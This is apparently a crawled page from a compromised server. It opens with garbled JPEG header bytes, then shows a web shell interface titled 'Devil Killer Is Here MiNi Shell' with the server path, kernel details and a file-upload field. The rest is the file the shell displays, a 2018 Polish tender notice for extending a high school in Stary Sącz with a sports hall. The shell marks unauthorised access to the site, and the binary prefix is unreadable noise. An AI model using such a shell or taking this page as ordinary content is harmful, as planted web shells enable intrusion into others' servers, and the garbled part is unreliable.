JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180605/567477-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 567477-N-2018 z dnia 2018-06-05 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zamówienie na roboty budowlane polegające na rozbudowie istniejącego budynku Liceum Ogólnokształcącego w Starym Sączu o halę sportową</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">491893180</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Jagiellońska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">33</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">33-300 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Nowy Sącz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">+48 18 41 41 600</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">bziecina@nowosadecki.pl, mzelasko@nowosadecki.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">+48 18 41 41 700</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.nowosadecki.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.nowosadecki.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferta wraz z wymienionym w art. 25a ust. 1 ustawy Pzp oświadczeniem oraz pełnomocnictwa wnoszone są do zamawiającego wyłącznie w formie pisemnej za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Starostwo Powiatowe w Nowym Sączu, ul. Jagiellońska 33, 33-300 Nowy Sącz</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zamówienie na roboty budowlane polegające na rozbudowie istniejącego budynku Liceum Ogólnokształcącego w Starym Sączu o halę sportową</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZPI.272.11.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">I. Przedmiotem zamówienia są roboty budowlane polegające na rozbudowie istniejącego budynku LiceumOgólnokształcącego w Starym Sączu o halę sportową wraz z uzyskaniem prawomocnej decyzjipozwolenia na użytkowanie. II. Zakres przedmiotowych robót budowlanych obejmuje w szczególności:a) roboty rozbiórkowe, b) roboty ziemne, c) roboty fundamentowe i izolacyjne, d) roboty związane zwykonaniem ścian konstrukcyjnych, e) roboty dekarskie, f) roboty stolarskie i ślusarskie związane zestolarką okienną i drzwiową, g) roboty tynkarskie i malarskie, h) roboty posadzkarskie, i) robotyinstalacyjne w zakresie instalacji elektrycznej, wod-kan, c.o. i p.poż., j) dostawę i prace związane zmontażem wyposażenia (trybun, platformy dla niepełnosprawnych i innego wyposażenia stałego), k)roboty zewnętrzne (wykonanie ciągów pieszych, odcinka drogi dojazdowej oraz placów postojowych).Przedmiot zamówienia obejmuje również obsługę geodezyjną i geologiczną, uruchomienie wykonanychinstalacji, przeszkolenie użytkownika, uzyskanie wszystkich zezwoleń i decyzji wymaganych przepisami prawa budowlanego umożliwiającymi użytkowanie przedmiotowego budynku zgodnie z jegoprzeznaczeniem. Miejsce realizacji robót budowlanych: budynek i teren Liceum Ogólnokształcącego im.Marii Skłodowskiej - Curie w Starym Sączu, ul. Partyzantów 15, 33-340 Stary Sącz, powiatnowosądecki, województwo małopolskie. Lokalizacja inwestycji: działka ewid. nr 2578, obr. Stary Sącz.Budynek szkoły oraz teren, na którym prowadzone będą roboty budowlane są użytkowane zgodnie z ichprzeznaczeniem. Wykonawca zobowiązany jest do prowadzenia robót w sposób zapewniającyniezakłócone użytkowanie obiektu i terenu oraz zachowanie bezpieczeństwa osób znajdujących się wobiekcie i w jego pobliżu. Wykonawca jest zobowiązany zapewnić swobodny i bezpieczny dostęp dobudynku. Prace powinny być prowadzone w uzgodnieniu z dyrektorem placówki. Szczegółowy zakresprzedmiotowych robót budowlanych został określony za pomocą dokumentacji technicznej stanowiącejZałącznik nr 1 do SIWZ. Na dokumentację techniczną składają się: projekty budowlane z rysunkamiwykonawczymi, przedmiary robót oraz specyfikacje techniczne wykonania i odbioru robót budowlanychdla poszczególnych branż. Wskazane roboty budowlane mają być wykonane zgodnie z dokumentacjątechniczną. UWAGA: Przedmiary robót będące częścią Załącznika nr 1 do SIWZ stanowią jedyniemateriał informacyjny co do rodzaju robót objętych niniejszym zamówieniem, zatem wykonawca niemoże powoływać się na przedmiary jako podstawę wyceny oferty. Zamawiający uzyskał w dniu13.03.2018 r. Decyzję nr 354/2018 Starosty Nowosądeckiego udzielającą pozwolenia na rozbudowębudynku użyteczności publicznej Liceum Ogólnokształcącego o halę sportową z instalacjami na działcenr 2578 w Starym Sączu. UWAGA: Podane w dokumentacji technicznej, ewentualne znaki towarowe,patenty, pochodzenie, nazwy własne towarów lub ich producentów, źródło lub szczególny proces, którycharakteryzuje produkty dostarczane przez konkretnego wykonawcę, mają charakter przykładowy, a ichwskazanie ma na celu określenie oczekiwanego standardu, przy czym Zamawiający dopuszcza składanieofert równoważnych na podstawie art. 30 ust. 5 ustawy Pzp. W przypadkach, w których przedmiotzamówienia opisany jest przez odniesienie do norm, europejskich ocen technicznych, aprobat,specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 30 ust. 1 pkt 2 i ust.3 ustawy Pzp, zamawiający dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemutowarzyszą wyrazy ,,lub równoważny". Wykonawca, który powołuje się na rozwiązania równoważneopisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego robotybudowlane spełniają wymagania określone przez zamawiającego. III. Specyfikacja istotnych warunkówzamówienia opisuje przedmiot zamówienia w sposób wyczerpujący i kompletny. Jednakże w celulepszego zapoznania się z przedmiotem zamówienia zamawiający umożliwia dokonanie przezwykonawcę (na własny koszt) oględzin miejsca, w którym nastąpi realizacja przedmiotu zamówienia ijego otoczenia i zaleca szczegółowe zapoznanie się z dokumentacją techniczną. Wykonawcyzainteresowani dokonaniem oględzin miejsca realizacji zamówienia, zobowiązani są zgłosić ten fakt do dnia 13.06.2018 r. Kierownikowi Zespołu Zamówień Publicznych i Inwestycji w Starostwie Powiatowym w Nowym Sączu - Panu Piotrowi Piechnikowi, pisemnie, faksem (18 41 41 700) lub mailem(powiat@nowosadecki.pl). O terminie przeprowadzenia oględzin zainteresowani wykonawcy zostanąpoinformowani pisemnie, faksem lub mailem. IV. Zamawiający wymaga, by na przedmiotowe robotybudowlane, stanowiące przedmiot niniejszego zamówienia wykonawca udzielił minimum 5 - letniejgwarancji jakości i rękojmi (uwaga: termin gwarancji jakości i rękojmi stanowi kryterium oceny ofert -patrz pkt 19 SIWZ). V. Zamawiający wymaga, aby wykonawca posiadał ubezpieczenie ododpowiedzialności cywilnej kontraktowej od wszystkich ryzyk na kwotę nie mniejszą od ceny całkowitejbrutto podanej w ofercie wykonawcy. Ubezpieczenie (polisa OC) musi być ważne przez cały okresrealizacji zamówienia. Wykonawca zobowiązany jest przedłożyć Zamawiającemu przed podpisaniemumowy w sprawie zamówienia publicznego potwierdzone za zgodność z oryginałem dokumentypotwierdzające posiadanie w/w ubezpieczenia OC. VI. Wykonanie przedmiotu zamówienia przebiegaćbędzie zgodnie z postanowieniami zawartymi w projekcie umowy, stanowiącym Załącznik nr 2 do SIWZ.VII. Szczegółowy opis przedmiotu zamówienia został zawarty w SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45214200-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45212200-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45330000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45321000-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">I. Termin wykonania (realizacji) zamówienia: Zamawiający wymagazakończenia wykonania (realizacji) zamówienia wraz z uzyskaniem ostatecznej decyzji pozwolenia naużytkowanie w terminie do 12 miesięcy od dnia przekazania terenu budowy, przy czym przekazanieterenu budowy nastąpi w terminie do 14 dni kalendarzowych od dnia zawarcia umowy z wybranymwykonawcą. II. Zamawiający zgodnie z art. 29 ust. 3a ustawy Pzp określa wymagania dotyczącezatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonującychwskazane poniżej czynności, gdyż wykonanie tych czynności polega na wykonywaniu pracy w sposóbokreślony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy /tekst jedn. Dz. U. z 2018 r. poz.917/: a. rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymaganiazatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonującychczynności w trakcie realizacji zamówienia: Zamawiający wymaga, aby wykonawca lub podwykonawcaprzez cały okres realizacji zamówienia zatrudniał na umowę o pracę osoby wykonujące czynności: - wzakresie prac rozbiórkowych, - w zakresie prac murarskich, - w zakresie prac zbrojeniowych, - w zakresieprac tynkarskich, - w zakresie prac dekarskich, - w zakresie montażu stolarki okiennej i drzwiowej, - wzakresie prac posadzkarskich, - w zakresie prac fliziarskich, - w zakresie wykonania instalacjielektrycznej, - w zakresie wykonania instalacji wod-kan., c.o. oraz p.poż., - w zakresie prac malarskich, -w zakresie prac ciesielskich. b. sposób dokumentowania zatrudnienia osób, o których mowa w art. 29 ust.3a ustawy Pzp: Wykonawca w terminie do 14 dni od dnia przekazania placu budowy dostarczyzamawiającemu wykaz osób, które będą wykonywały opisane powyżej czynności na podstawie umowy opracę. Wykaz osób musi zawierać informacje jednoznacznie wskazujące osobę pracownika oraz zakreswykonywanych przez niego czynności. Zatrudnienie powinno trwać minimalnie przez okreswykonywania odpowiednich czynności, o których mowa w pkt II lit. a. c. uprawnienia zamawiającego wzakresie kontroli spełniania przez wykonawcę lub podwykonawcę wymagań, o których mowa w art. 29 ust. 3a ustawy Pzp oraz sankcje z tytułu niespełnienia tych wymagań: o zamawiający ma prawo w każdymmomencie realizacji zamówienia zwrócić się do wykonawcy o przedłożenie aktualnego wykazu osóbwykonujących opisane powyżej czynności na podstawie umowy o pracę, natomiast wykonawca maobowiązek przedłożyć ten wykaz zamawiającemu niezwłocznie, nie później jednak niż w terminie 3 dniod pisemnego wezwania, o w przypadku niespełnienia przez wykonawcę wymogu zatrudnienia napodstawie umowy o pracę osoby/osób wykonującej/-ych wskazane powyżej czynności Zamawiającyprzewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej w wysokości 500,00 złza każdy dzień niespełnienia tego wymogu, o naruszenie obowiązku udokumentowania zatrudnienia osóbwykonujących wymienione powyżej czynności, opisanego w lit. b oraz w lit. c tiret 1 traktowane będziejako niespełnienie przez wykonawcę wymogu zatrudnienia na podstawie umowy o pracę osoby/osóbwykonującej/-ych wskazane powyżej czynności, w takiej sytuacji wykonawca zapłaci zamawiającemukarę umowną w wysokości 500 zł brutto za każdy dzień zwłoki w dostarczeniu w/w wykazu. Jeżelizwłoka przekroczy 10 dni zamawiającemu przysługuje prawo odstąpienia od umowy z winy wykonawcyi prawo do naliczenia kary umownej w wysokości 30% ceny oferty wykonawcy, o w przypadkuuzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę 